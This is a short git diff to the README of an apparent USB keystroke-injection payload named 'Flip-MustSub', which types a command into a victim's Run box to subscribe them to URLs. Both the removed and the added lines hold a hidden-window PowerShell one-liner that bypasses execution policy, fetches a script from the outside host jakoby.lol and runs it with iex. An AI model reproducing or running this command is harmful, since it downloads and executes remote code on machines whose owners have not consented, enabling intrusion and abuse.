diff --git a/Payloads/Flip-MustSub/Readme.md b/Payloads/Flip-MustSub/Readme.md index 6a01c8e..9e7720f 100644 --- a/Payloads/Flip-MustSub/Readme.md +++ b/Payloads/Flip-MustSub/Readme.md @@ -45,7 +45,7 @@ Each URL will be passed through the subscribe function. * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload ``` -powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/14q | iex +powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex ```